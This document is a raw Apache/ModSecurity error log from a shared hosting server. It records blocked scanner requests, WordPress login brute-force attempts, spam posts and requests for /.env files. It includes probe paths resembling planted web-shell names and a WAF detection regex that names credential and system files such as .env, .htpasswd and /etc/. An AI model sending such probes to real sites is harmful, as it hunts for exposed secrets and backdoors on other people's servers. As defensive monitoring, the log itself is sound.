[Tue May 26 16:50:18.535945 2026] [security2:error] [pid 823496:tid 823652] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWB8Ja08mrtyBNpA4PghwAAABg"]
[Tue May 26 16:50:18.882307 2026] [security2:error] [pid 823496:tid 823733] [client 20.206.111.149:60609] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wp-admin/css/colors/blue/file.php"] [unique_id "ahWB8pa08mrtyBNpA4PgrAAAAGk"]
[Tue May 26 16:50:18.882433 2026] [security2:error] [pid 823496:tid 823733] [client 20.206.111.149:60609] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wp-admin/css/colors/blue/file.php"] [unique_id "ahWB8pa08mrtyBNpA4PgrAAAAGk"]
[Tue May 26 16:50:19.324015 2026] [security2:error] [pid 817651:tid 817809] [client 20.206.111.149:21752] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/favicon.php"] [unique_id "ahWB89lGRCPPN1dS2y2-8gAAAKE"]
[Tue May 26 16:50:19.324141 2026] [security2:error] [pid 817651:tid 817809] [client 20.206.111.149:21752] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/favicon.php"] [unique_id "ahWB89lGRCPPN1dS2y2-8gAAAKE"]
[Tue May 26 16:50:19.486314 2026] [security2:error] [pid 817651:tid 817798] [client 138.219.120.183:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWB89lGRCPPN1dS2y2--AAAAJY"], referer: https://www.anujtradingco.com/
[Tue May 26 16:50:19.692229 2026] [security2:error] [pid 823496:tid 823735] [client 176.65.139.236:43238] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "aeromodellingconsultants.glorodavionics.com"] [uri "/.env"] [unique_id "ahWB85a08mrtyBNpA4PgswAAAGs"]
[Tue May 26 16:50:19.730530 2026] [security2:error] [pid 823496:tid 823681] [client 20.206.111.149:64412] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/aboutc.php"] [unique_id "ahWB85a08mrtyBNpA4PgtAAAADU"]
[Tue May 26 16:50:19.730692 2026] [security2:error] [pid 823496:tid 823681] [client 20.206.111.149:64412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/aboutc.php"] [unique_id "ahWB85a08mrtyBNpA4PgtAAAADU"]
[Tue May 26 16:50:20.090850 2026] [security2:error] [pid 823496:tid 823727] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWB8pa08mrtyBNpA4PgowAAAGM"]
[Tue May 26 16:50:20.286450 2026] [security2:error] [pid 823496:tid 823752] [client 20.206.111.149:59339] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wp-load.php"] [unique_id "ahWB9Ja08mrtyBNpA4PgtwAAAHw"]
[Tue May 26 16:50:20.286563 2026] [security2:error] [pid 823496:tid 823752] [client 20.206.111.149:59339] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wp-load.php"] [unique_id "ahWB9Ja08mrtyBNpA4PgtwAAAHw"]
[Tue May 26 16:50:20.412275 2026] [security2:error] [pid 823496:tid 823694] [client 138.219.120.183:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWB9Ja08mrtyBNpA4PgugAAAEI"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1418267&moderation-hash=9be30dabce180487f5f9cabe7d60938d
[Tue May 26 16:50:20.747644 2026] [security2:error] [pid 817651:tid 817844] [client 20.206.111.149:26272] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/aevly.php"] [unique_id "ahWB9NlGRCPPN1dS2y2_CQAAAMQ"]
[Tue May 26 16:50:20.747755 2026] [security2:error] [pid 817651:tid 817844] [client 20.206.111.149:26272] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/aevly.php"] [unique_id "ahWB9NlGRCPPN1dS2y2_CQAAAMQ"]
[Tue May 26 16:50:21.137535 2026] [security2:error] [pid 817651:tid 817882] [client 20.206.111.149:21740] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/atkno.php"] [unique_id "ahWB9dlGRCPPN1dS2y2_DwAAAOo"]
[Tue May 26 16:50:21.137615 2026] [security2:error] [pid 817651:tid 817882] [client 20.206.111.149:21740] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/atkno.php"] [unique_id "ahWB9dlGRCPPN1dS2y2_DwAAAOo"]
[Tue May 26 16:50:21.605355 2026] [security2:error] [pid 823496:tid 823688] [client 113.165.5.68:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWB85a08mrtyBNpA4PgsgAAADw"]
[Tue May 26 16:50:21.735827 2026] [security2:error] [pid 817651:tid 817838] [client 20.206.111.149:23187] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/mini.php"] [unique_id "ahWB9dlGRCPPN1dS2y2_HgAAAL4"]
[Tue May 26 16:50:21.735958 2026] [security2:error] [pid 817651:tid 817838] [client 20.206.111.149:23187] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/mini.php"] [unique_id "ahWB9dlGRCPPN1dS2y2_HgAAAL4"]
[Tue May 26 16:50:21.984496 2026] [security2:error] [pid 817651:tid 817845] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWB9NlGRCPPN1dS2y2_AgAAAMU"]
[Tue May 26 16:50:22.136750 2026] [security2:error] [pid 817651:tid 817820] [client 20.206.111.149:2493] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wp-thi.php"] [unique_id "ahWB9tlGRCPPN1dS2y2_IQAAAKw"]
[Tue May 26 16:50:22.136918 2026] [security2:error] [pid 817651:tid 817820] [client 20.206.111.149:2493] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wp-thi.php"] [unique_id "ahWB9tlGRCPPN1dS2y2_IQAAAKw"]
[Tue May 26 16:50:22.267310 2026] [security2:error] [pid 817651:tid 817866] [client 178.20.43.173:51605] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 173.43.20.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWB9tlGRCPPN1dS2y2_JAAAANo"], referer: https://anujtradingco.com/wp-login.php?action=register
[Tue May 26 16:50:22.525702 2026] [security2:error] [pid 823496:tid 823636] [client 20.206.111.149:22845] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wp-kd4xalrg7m.php"] [unique_id "ahWB9pa08mrtyBNpA4PgwQAAAAg"]
[Tue May 26 16:50:22.525803 2026] [security2:error] [pid 823496:tid 823636] [client 20.206.111.149:22845] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wp-kd4xalrg7m.php"] [unique_id "ahWB9pa08mrtyBNpA4PgwQAAAAg"]
[Tue May 26 16:50:22.909176 2026] [security2:error] [pid 817651:tid 817894] [client 138.219.120.183:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWB9tlGRCPPN1dS2y2_KwAAAPY"], referer: https://anujtradingco.com
[Tue May 26 16:50:22.946251 2026] [security2:error] [pid 823496:tid 823691] [client 20.206.111.149:2486] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/amax.php"] [unique_id "ahWB9pa08mrtyBNpA4PgwwAAAD8"]
[Tue May 26 16:50:22.946362 2026] [security2:error] [pid 823496:tid 823691] [client 20.206.111.149:2486] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/amax.php"] [unique_id "ahWB9pa08mrtyBNpA4PgwwAAAD8"]
[Tue May 26 16:50:23.050763 2026] [security2:error] [pid 823496:tid 823719] [client 178.20.43.173:52072] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "178.20.43.173" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWB95a08mrtyBNpA4PgxAAAAFs"], referer: https://anujtradingco.com/wp-login.php?action=register
[Tue May 26 16:50:23.385487 2026] [security2:error] [pid 817651:tid 817831] [client 117.198.37.168:53601] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWB99lGRCPPN1dS2y2_MgAAALc"]
[Tue May 26 16:50:23.385678 2026] [security2:error] [pid 817651:tid 817831] [client 117.198.37.168:53601] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWB99lGRCPPN1dS2y2_MgAAALc"]
[Tue May 26 16:50:23.522880 2026] [security2:error] [pid 823496:tid 823746] [client 20.206.111.149:2784] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wehrman.php"] [unique_id "ahWB95a08mrtyBNpA4PgxgAAAHY"]
[Tue May 26 16:50:23.523011 2026] [security2:error] [pid 823496:tid 823746] [client 20.206.111.149:2784] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wehrman.php"] [unique_id "ahWB95a08mrtyBNpA4PgxgAAAHY"]
[Tue May 26 16:50:23.531790 2026] [security2:error] [pid 823496:tid 823689] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWB9pa08mrtyBNpA4PgvQAAAD0"]
[Tue May 26 16:50:24.134262 2026] [security2:error] [pid 823496:tid 823650] [client 20.206.111.149:23168] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/b.php"] [unique_id "ahWB-Ja08mrtyBNpA4PgzQAAABY"]
[Tue May 26 16:50:24.134394 2026] [security2:error] [pid 823496:tid 823650] [client 20.206.111.149:23168] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/b.php"] [unique_id "ahWB-Ja08mrtyBNpA4PgzQAAABY"]
[Tue May 26 16:50:24.672176 2026] [security2:error] [pid 823496:tid 823601] [remote 141.95.202.18:52352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWB-Ja08mrtyBNpA4Pg0gAAF2Y"]
[Tue May 26 16:50:24.825817 2026] [security2:error] [pid 817651:tid 817886] [client 20.206.111.149:2806] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wp-sing.php"] [unique_id "ahWB-NlGRCPPN1dS2y2_QgAAAO4"]
[Tue May 26 16:50:24.825917 2026] [security2:error] [pid 817651:tid 817886] [client 20.206.111.149:2806] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wp-sing.php"] [unique_id "ahWB-NlGRCPPN1dS2y2_QgAAAO4"]
[Tue May 26 16:50:24.967351 2026] [authz_core:error] [pid 817651:tid 817849] [client 176.65.139.232:64574] AH01630: client denied by server configuration: /home2/azurm42s/public_html/dolibarrtraining.azurmediatec.com/.env
[Tue May 26 16:50:25.370721 2026] [security2:error] [pid 817651:tid 817843] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWB-NlGRCPPN1dS2y2_OQAAAMM"]
[Tue May 26 16:50:26.199930 2026] [security2:error] [pid 817651:tid 817860] [client 20.206.111.149:39080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wp-links-opml.php"] [unique_id "ahWB-tlGRCPPN1dS2y2_SgAAANQ"]
[Tue May 26 16:50:26.200015 2026] [security2:error] [pid 817651:tid 817860] [client 20.206.111.149:39080] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wp-links-opml.php"] [unique_id "ahWB-tlGRCPPN1dS2y2_SgAAANQ"]
[Tue May 26 16:50:27.287373 2026] [security2:error] [pid 823496:tid 823628] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWB-pa08mrtyBNpA4Pg6wAAAAA"]
[Tue May 26 16:50:27.749261 2026] [security2:error] [pid 823496:tid 823633] [client 20.206.111.149:26309] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/edit.php"] [unique_id "ahWB-5a08mrtyBNpA4PhAwAAAAU"]
[Tue May 26 16:50:27.749391 2026] [security2:error] [pid 823496:tid 823633] [client 20.206.111.149:26309] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/edit.php"] [unique_id "ahWB-5a08mrtyBNpA4PhAwAAAAU"]
[Tue May 26 16:50:28.829537 2026] [security2:error] [pid 817651:tid 817871] [client 20.206.111.149:39077] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wmore1.php"] [unique_id "ahWB_NlGRCPPN1dS2y2_YwAAAN8"]
[Tue May 26 16:50:28.829660 2026] [security2:error] [pid 817651:tid 817871] [client 20.206.111.149:39077] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wmore1.php"] [unique_id "ahWB_NlGRCPPN1dS2y2_YwAAAN8"]
[Tue May 26 16:50:29.233434 2026] [security2:error] [pid 823496:tid 823629] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWB_Ja08mrtyBNpA4PhDAAAAAE"]
[Tue May 26 16:50:29.817974 2026] [security2:error] [pid 817651:tid 817816] [client 20.206.111.149:26337] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wp-access.php"] [unique_id "ahWB_dlGRCPPN1dS2y2_agAAAKg"]
[Tue May 26 16:50:29.818085 2026] [security2:error] [pid 817651:tid 817816] [client 20.206.111.149:26337] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wp-access.php"] [unique_id "ahWB_dlGRCPPN1dS2y2_agAAAKg"]
[Tue May 26 16:50:30.378924 2026] [security2:error] [pid 817651:tid 817862] [client 20.206.111.149:39064] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/1.php"] [unique_id "ahWB_tlGRCPPN1dS2y2_dwAAANY"]
[Tue May 26 16:50:30.379033 2026] [security2:error] [pid 817651:tid 817862] [client 20.206.111.149:39064] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/1.php"] [unique_id "ahWB_tlGRCPPN1dS2y2_dwAAANY"]
[Tue May 26 16:50:30.379123 2026] [security2:error] [pid 817651:tid 817862] [client 20.206.111.149:39064] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/1.php"] [unique_id "ahWB_tlGRCPPN1dS2y2_dwAAANY"]
[Tue May 26 16:50:30.941604 2026] [security2:error] [pid 817651:tid 817856] [client 20.206.111.149:30136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/sbhu.php"] [unique_id "ahWB_tlGRCPPN1dS2y2_fAAAANA"]
[Tue May 26 16:50:30.941783 2026] [security2:error] [pid 817651:tid 817856] [client 20.206.111.149:30136] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/sbhu.php"] [unique_id "ahWB_tlGRCPPN1dS2y2_fAAAANA"]
[Tue May 26 16:50:31.009401 2026] [security2:error] [pid 817651:tid 817852] [client 89.124.112.117:49688] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "89.124.112.117" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "panda-eco.com"] [uri "/wp-comments-post.php"] [unique_id "ahWB_9lGRCPPN1dS2y2_fQAAAMw"], referer: http://panda-eco.com/hello-world/
[Tue May 26 16:50:31.009493 2026] [security2:error] [pid 817651:tid 817852] [client 89.124.112.117:49688] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "panda-eco.com"] [uri "/wp-comments-post.php"] [unique_id "ahWB_9lGRCPPN1dS2y2_fQAAAMw"], referer: http://panda-eco.com/hello-world/
[Tue May 26 16:50:31.533648 2026] [security2:error] [pid 817651:tid 817892] [client 20.206.111.149:63772] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/bgymj.php"] [unique_id "ahWB_9lGRCPPN1dS2y2_gQAAAPQ"]
[Tue May 26 16:50:31.533798 2026] [security2:error] [pid 817651:tid 817892] [client 20.206.111.149:63772] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/bgymj.php"] [unique_id "ahWB_9lGRCPPN1dS2y2_gQAAAPQ"]
[Tue May 26 16:50:31.540147 2026] [security2:error] [pid 823496:tid 823753] [client 216.246.13.181:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahWB_Ja08mrtyBNpA4PhHAAAAH0"]
